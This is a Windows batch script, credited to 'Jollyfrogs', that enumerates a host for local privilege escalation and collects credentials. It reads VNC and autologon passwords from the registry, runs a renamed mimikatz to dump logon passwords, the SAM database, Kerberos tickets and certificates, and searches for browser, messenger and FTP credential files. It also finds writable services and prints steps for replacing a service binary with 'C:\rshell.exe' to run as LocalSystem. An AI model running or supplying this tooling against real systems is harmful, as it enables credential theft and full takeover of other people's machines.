@echo OFF
REM Windows local privilege-escalation / loot enumeration script (batch).
REM Run from a writable working directory: it writes systeminfo.txt, dirlisting.txt,
REM registrydump.txt and serviceexes.txt there and leaves them behind.
call:credits
call:CheckOSbitrate
call:CheckOSversion
call:checkprerequisitefiles
call:checkquickwins
call:getfirewallinformation
call:getcomputerinformation
call:dumphashespasseskerberoscerts
call:findinterestingfiles
call:findinterestingregistrykeys
call:findpasswords
call:checkweakpermissions
call:cleanup
goto end

:credits
echo.----------------------------------------------------
echo.Author: Jollyfrogs, Brisbane QLD
echo.A root loot script I used to learn batch techniques, needs TLC
echo.----------------------------------------------------
echo.
goto:eof

:CheckOSbitrate
REM ProgramFiles(x86) only exists on 64-bit Windows
IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32)
goto:eof

:checkprerequisitefiles
REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE
echo ====================================================================
echo ====================== IGNORE THESE ERRORS =========================
REM jollykatz32.exe / jollykatz64.exe is a renamed mimikatz build expected next to this script
dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL
IF %ERRORLEVEL% == 0 set jollykatz=1
for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a
for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a
REM
REM check registry for the following registry entries:
REM
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
IF %ERRORLEVEL% == 0 (
    REM %ERRORLEVEL% inside a parenthesised block is expanded when the block is parsed, not when
    REM the inner command has run, so the inner test uses IF NOT ERRORLEVEL 1 (evaluated at run time)
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
    IF NOT ERRORLEVEL 1 (set alwaysinstallelevated=1)
)
reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL
IF %ERRORLEVEL% == 0 (set IE6found=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL
IF %ERRORLEVEL% == 0 (set IE7found=1)
reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set AIM6found=1)
reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL
IF %ERRORLEVEL% == 0 (set AIMPROfound=1)
reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL
IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)
reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL
IF %ERRORLEVEL% == 0 (set BIGANTfound=1)
reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL
IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)
reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)
reg query "HKCU\SOFTWARE\IMVU" 1>NUL
IF %ERRORLEVEL% == 0 (set IMVUfound=1)
reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL
IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)
reg query "HKCU\SOFTWARE\Paltalk" 1>NUL
IF %ERRORLEVEL% == 0 (set PALTALKfound=1)
reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL
IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)
reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL
IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows Messaging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\Outlook\OMI Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)
reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL
IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)
reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL
IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)
reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set IDMfound=1)
reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL
IF %ERRORLEVEL% == 0 (set PICASAfound=1)
reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set realvncpassfound=1)
reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)
reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)
reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)
reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL
IF %ERRORLEVEL% == 0 (
    For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b
)
REM we check that the registry value is not empty. The test sits outside the block above because
REM %defaultloginpass% inside the block would be expanded before the FOR had run.
IF DEFINED defaultloginpass set winautologinpassfound=1
set defaultloginpass=
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)
REM
REM
echo ====================== IGNORE THESE ERRORS =========================
echo ====================================================================
echo.
goto:eof

:CheckOSVersion
ver | find "2003" > nul
if %ERRORLEVEL% == 0 goto ver_2003
ver | find "XP" > nul
if %ERRORLEVEL% == 0 goto ver_xp
ver | find "2000" > nul
if %ERRORLEVEL% == 0 goto ver_2000
ver | find "NT" > nul
if %ERRORLEVEL% == 0 goto ver_nt
if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit
systeminfo | find "OS Name" > %TEMP%\osname.txt
FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i
echo %vers% | find "Windows 7" > nul
if %ERRORLEVEL% == 0 goto ver_7
echo %vers% | find "Windows Server 2008" > nul
if %ERRORLEVEL% == 0 goto ver_2008
echo %vers% | find "Windows Vista" > nul
if %ERRORLEVEL% == 0 goto ver_vista
goto versioncheckwarnthenexit
:ver_7
REM Run Windows 7 specific commands here.
set OSVersion=WIN7
goto versioncheckexit
:ver_2008
REM Run Windows Server 2008 specific commands here.
set OSVersion=WIN2008
goto versioncheckexit
:ver_vista
REM Run Windows Vista specific commands here.
set OSVersion=WINVISTA
goto versioncheckexit
:ver_2003
REM Run Windows Server 2003 specific commands here.
set OSVersion=WIN2003
goto versioncheckexit
:ver_xp
REM Run Windows XP specific commands here.
set OSVersion=WINXP
goto versioncheckexit
:ver_2000
REM Run Windows 2000 specific commands here.
set OSVersion=WIN2000
goto versioncheckexit
:ver_nt
REM Run Windows NT specific commands here.
set OSVersion=WINNT
goto versioncheckexit
:versioncheckwarnthenexit
set OSVersion=UNDETERMINED
goto:versioncheckexit
:versioncheckexit
goto:eof

:checkquickwins
systeminfo > systeminfo.txt
REM === Generic tests across all Windows versions here
IF DEFINED alwaysinstallelevated (
    echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****
    set alwaysinstallelevated=
    echo.
)
IF DEFINED realvncpassfound (
    echo **** !!! REALVNC PASS FOUND !!! ****
    reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"
    echo ************************************
    set realvncpassfound=
    echo.
)
IF DEFINED tightvncpassfound1 (
    echo **** !!! TIGHTVNC PASS FOUND !!! ****
    reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"
    echo *************************************
    set tightvncpassfound1=
    echo.
)
IF DEFINED tightvncpassfound2 (
    echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****
    reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"
    echo **********************************************
    set tightvncpassfound2=
    echo.
)
IF DEFINED tigervncpassfound (
    echo **** !!! TIGERVNC PASS FOUND !!! ****
    reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"
    echo *************************************
    set tigervncpassfound=
    echo.
)
IF DEFINED vnc3passfound1 (
    echo **** !!! VNC3 PASS FOUND !!! ****
    reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"
    echo *********************************
    set vnc3passfound1=
    echo.
)
IF DEFINED vnc3passfound2 (
    echo **** !!! VNC3 PASS FOUND !!! ****
    reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"
    echo *********************************
    set vnc3passfound2=
    echo.
)
IF DEFINED vnc3passfound3 (
    echo **** !!! VNC3 PASS FOUND !!! ****
    reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"
    echo *********************************
    set vnc3passfound3=
    echo.
)
IF DEFINED winautologinpassfound (
    echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"
    echo **********************************************
    IF DEFINED winautologinuserfound (
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"
        set winautologinuserfound=
    )
    IF DEFINED winautologindomainfound (
        reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"
        set winautologindomainfound=
    )
    set winautologinpassfound=
)
goto:eof
REM The block below is unreachable (it sits after goto:eof) and is kept as a placeholder for per-version checks
if %OSVersion%==WINXP (
    REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches
    REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a
    REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj
    REM set MYKB=
    REM echo.
)
goto:eof

:getfirewallinformation
echo.
IF DEFINED netshfirewall (
    REM "netsh firewall" is the legacy context; on Vista and later "netsh advfirewall show allprofiles" gives the per-profile picture
    echo.
    echo.Firewall Status
    echo.---------------
    netsh firewall show state
    echo.
    echo.
    echo.Firewall configuration details
    echo.------------------------------
    echo.
    netsh firewall show config
    echo.
) ELSE (
    echo === NOTE: The netsh firewall command was not found, skipping checks ===
)
echo.
goto:eof

:getcomputerinformation
echo.
echo.This computer is running %OSbit%-bit Windows
echo.
IF DEFINED whoami (
    echo.
    echo.Are we running an elevated command prompt?
    echo.------------------------------------------
    REM an elevated (UAC-approved) token carries the "Mandatory Label\High Mandatory Level" group
    for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a
    IF DEFINED runningelevatedprompt (
        echo YES, we ARE!
    ) ELSE (
        echo Sadly, no...
    )
    echo.
    echo.User Groups
    echo.-----------
    whoami /groups
    echo.
) ELSE (
    echo === NOTE: The whoami command was not found, skipping checks ===
)
echo.
echo.User Accounts
echo.-------------
net users
echo.
echo.Systeminfo
echo.----------
systeminfo
echo.
echo.Netstat -ano
echo.------------
netstat -ano
echo.
echo.Scheduled tasks
echo.---------------
schtasks /query /fo LIST /v
echo.
echo.Task to service mapping
echo.-----------------------
tasklist /SVC
echo.
echo.Network settings
echo.----------------
ipconfig /all
echo.
echo.Running windows services
echo.------------------------
net start
echo.
echo.Listing Windows drivers
echo.-----------------------
DRIVERQUERY
echo.
echo.Dumping Windows registry to registrydump.txt
echo.--------------------------------------------
REM a full recursive dump of HKLM and HKCU is large and slow; it is left on disk for offline grepping
reg query HKLM /s > registrydump.txt
reg query HKCU /s >> registrydump.txt
echo.
echo.Environment variables
echo.---------------------
set
echo.
echo.Group Policy
echo.------------
gpresult /R >NUL 2>&1
IF %ERRORLEVEL% == 1 (
    REM WINXP: gpresult there has no /R switch
    gpresult
) ELSE (
    REM WIN7
    gpresult /R
)
echo.
REM ** ALEX TO ADD CREDENUMERATE **
goto:eof

:dumphashespasseskerberoscerts
echo.Hashes, passwords, kerberos tickets and certificates
echo.-----------------
IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===
IF NOT DEFINED jollykatz goto:eof
REM privilege::debug and token::elevate need an elevated prompt; without it these calls fail
echo.
echo.sekurlsa::logonPasswords full
echo.------
jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
echo.
echo.lsadump::sam
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
echo.
echo.sekurlsa::tickets /export
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit"
echo.
echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit"
echo.
goto:eof

:findinterestingfiles
echo.Interesting files and directories
echo.---------------------------------
dir C:\* /a/s/b > dirlisting.txt
type dirlisting.txt | findstr /I \.*proof[.]txt$
type dirlisting.txt | findstr /I \.*network-secret[.]txt$
type dirlisting.txt | findstr /I \.*ssh.*[.]ini$
type dirlisting.txt | findstr /I \.*ultravnc[.]ini$
type dirlisting.txt | findstr /I \.*vnc[.]ini$
type dirlisting.txt | findstr /I \.*bthpan[.]sys$
type dirlisting.txt | findstr /I \.*\\repair$
type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$
type dirlisting.txt | findstr /I \.*[.]vnc$
REM Group Policy Preference files below may carry cpassword values
type dirlisting.txt | findstr /I \.*groups[.]xml$
type dirlisting.txt | findstr /I \.*printers[.]xml$
type dirlisting.txt | findstr /I \.*drives[.]xml$
type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$
type dirlisting.txt | findstr /I \.*services[.]xml$
type dirlisting.txt | findstr /I \.*datasources[.]xml$
type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$
type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$
type dirlisting.txt | findstr /I \.*[.]dbx$
type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$
type dirlisting.txt | findstr /I \.*ntds[.].*$
type dirlisting.txt | findstr /I \.*hiberfil[.].*$
type dirlisting.txt | findstr /I \.*boot[.]ini$
type dirlisting.txt | findstr /I \.*win[.]ini$
type dirlisting.txt | findstr /I \.*.\\config\\RegBack
type dirlisting.txt | findstr /I \.*.\\CCM\\logs
type dirlisting.txt | findstr /I \.*.\\iis.[.]log$
type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$
type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles
type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$
type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$
type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*.
type dirlisting.txt | findstr /I \.*.syspre.*.[.]...$
type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$
type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$
type dirlisting.txt | findstr /I \.*Login.Data$
type dirlisting.txt | findstr /I \.*Web.Data$
type dirlisting.txt | findstr /I \.*Credentials.Store$
type dirlisting.txt | findstr /I \.*Credential.Store$
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
REM Avant Browser:
type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$
type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$
REM Comodo Dragon
type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.*
REM CoolNovo
type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.*
REM Firefox
type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$
type dirlisting.txt | findstr /I \.*key3[.]db$
REM Flock Browser
type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.*
REM Google Chrome
type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.*
type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.*
REM Internet Explorer
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
REM Maxthon
type dirlisting.txt | findstr /I \.*MagicFill.*
type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$
REM Opera
type dirlisting.txt | findstr /I \.*Wand[.]dat$
REM Safari
type dirlisting.txt | findstr /I \.*keychain[.]plist$
REM SeaMonkey
type dirlisting.txt | findstr /I \.*signons[.]sqlite$
REM AIM
type dirlisting.txt | findstr /I \.*aimx[.]bin$
REM Digsby
type dirlisting.txt | findstr /I \.*logininfo[.]yaml$
type dirlisting.txt | findstr /I \.*digsby[.]dat$
REM Meebo Notifier
type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$
REM Miranda IM
type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$
REM MySpace IM
type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$
REM Pidgin
type dirlisting.txt | findstr /I \.*Accounts[.]xml$
REM Skype
type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$
REM Tencent QQ
type dirlisting.txt | findstr /I \.*Registry[.]db$
REM Trillian
type dirlisting.txt | findstr /I \.*accounts[.]ini$
REM XFire
type dirlisting.txt | findstr /I \.*XfireUser[.]ini$
REM Foxmail
type dirlisting.txt | findstr /I \.*Account[.]stg$
type dirlisting.txt | findstr /I \.*Accounts[.]tdat$
REM ThunderBird
type dirlisting.txt | findstr /I \.*signons[.]sqlite$
REM Windows Live Mail
type dirlisting.txt | findstr /I \.*[.]oeaccount$
REM FileZilla
type dirlisting.txt | findstr /I \.*recentservers[.]xml$
REM FlashFXP
type dirlisting.txt | findstr /I \.*Sites[.]dat$
REM FTPCommander
type dirlisting.txt | findstr /I \.*Ftplist[.]txt$
REM SmartFTP
type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$
REM WS_FTP
type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$
REM Heroes of Newerth
type dirlisting.txt | findstr /I \.*login[.]cfg$
REM JDownloader
type dirlisting.txt | findstr /I \.*JDownloader.*
type dirlisting.txt | findstr /I \.*database[.]script$
type dirlisting.txt | findstr /I \.*accounts[.]ejs$
REM OrbitDownloader
type dirlisting.txt | findstr /I \.*sitelogin[.]dat$
REM Seesmic
type dirlisting.txt | findstr /I \.*data[.]db$
REM SuperPutty
type dirlisting.txt | findstr /I \.*sessions[.]xml$
REM TweetDeck
type dirlisting.txt | findstr /I \.*TweetDeck.*
type dirlisting.txt | findstr /I \.*[.]localstorage$
echo.
goto:eof

:findinterestingregistrykeys
REM Source: securityxploded dot com slash passwordsecrets dot php
REM The *found flags are environment variables, so they are tested with IF DEFINED (IF EXIST tests for files)
IF DEFINED AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")
IF DEFINED AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")
IF DEFINED IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")
IF DEFINED IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")
IF DEFINED BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")
IF DEFINED BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")
IF DEFINED CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")
IF DEFINED GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")
IF DEFINED IMVUfound (reg query "HKCU\SOFTWARE\IMVU")
IF DEFINED NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")
IF DEFINED PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")
IF DEFINED YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")
IF DEFINED INCREDIMAILfound (reg query "HKCU\SOFTWARE\IncrediMail")
IF DEFINED OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")
IF DEFINED OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles")
IF DEFINED OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messaging Subsystem\Profiles")
IF DEFINED OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlook\OMI Account Manager\Accounts")
IF DEFINED OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")
IF DEFINED DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")
IF DEFINED GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")
IF DEFINED IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")
IF DEFINED PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")
REM
goto:eof

:findpasswords
echo.Searching for passwords (this can take a while)
echo.-----------------------------------------------
REM /s recurses from the current directory, so run the script from the root you want searched
findstr /si pwd= *.xml *.ini *.txt
findstr /si password= *.xml *.ini *.txt
findstr /si pass= *.xml *.ini *.txt
goto:eof

:checkweakpermissions
echo.Searching for weak service permissions (this can take a while)
echo.--------------------------------------------------------------
if exist serviceexes.txt del serviceexes.txt
if exist dirlisting.txt del dirlisting.txt
dir \ /a/s/b > dirlisting.txt
for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt
REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo
REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)
REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead
REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on
REM Note: findstr /I "W F" matches lines containing a W OR an F anywhere (the path on the first cacls line included),
REM and misses cacls "C" (change) rights, so treat these hits as leads to confirm with icacls or accesschk
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
echo.Files and folder with Read-Write access
echo.---------------------------------------
dir accesschk.exe /a/s/b >NUL 2>&1
IF NOT %ERRORLEVEL% == 0 (
    echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===
    goto:eof
)
accesschk.exe /accepteula >NUL 2>&1
accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
accesschk.exe -uwqs "Authenticated Users" c:\*.* | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.
echo.Searching for weak service permissions
echo.--------------------------------------
accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
    echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****
    accesschk.exe -uwcqv "Authenticated Users" *
    echo.****************************************************************
    echo.
)
accesschk.exe /accepteula >NUL 2>&1
accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
    echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****
    accesschk.exe -uwcqv "Users" *
    echo.*******************************************************
    echo.To plant binary in service use:
    echo.sc config [service_name] binpath= "C:\rshell.exe"
    echo.sc config [service_name] obj= ".\LocalSystem" password= ""
    echo.sc qc [service_name] (to verify!)
    echo.net start [service_name]
    echo.*******************************************************
)
accesschk.exe /accepteula >NUL 2>&1
accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL
if %ERRORLEVEL% == 0 (
    echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****
    accesschk.exe -uwcqv "Everyone" *
    echo.*******************************************************
    echo.To plant binary in service use:
    echo.sc config [service_name] binpath= "C:\rshell.exe"
    echo.sc config [service_name] obj= ".\LocalSystem" password= ""
    echo.sc qc [service_name] (to verify!)
    echo.net start [service_name]
    echo.*******************************************************
)
goto:eof

:cleanup
REM Only environment variables are cleared here; the output files written to the working directory stay on disk
set jollykatz=
set accesschk=
set OSbit=
set whoami=
set runningelevatedprompt=
set netshfirewall=
set OSVersion=
set vers=
set alwaysinstallelevated=
set realvncpassfound=
set tightvncpassfound1=
set tightvncpassfound2=
set tigervncpassfound=
set vnc3passfound1=
set vnc3passfound2=
set vnc3passfound3=
set winautologinpassfound=
set winautologindomainfound=
set winautologinuserfound=
set defaultloginpass=
set IE6found=
set IE7found=
set AIM6found=
set AIMPROfound=
set BEYLUXEfound=
set BIGANTfound=
set CAMFROGfound=
set GOOGLETALKfound=
set IMVUfound=
set NIMBUZZfound=
set PALTALKfound=
set YAHOOPAGERfound=
set INCREDIMAILfound=
set OUTLOOK2013found=
set OUTLOOK2010POSTNTfound=
set OUTLOOK2010PRENTfound=
set OUTLOOK98MAILONLYfound=
set OUTLOOK98NORMALfound=
set DREAMWEAVERfound=
set GMAILDESKTOPfound=
set IDMfound=
set PICASAfound=
goto:eof

:end
echo.
echo.==============
echo.Dump complete!
echo.==============
GOTO:eof
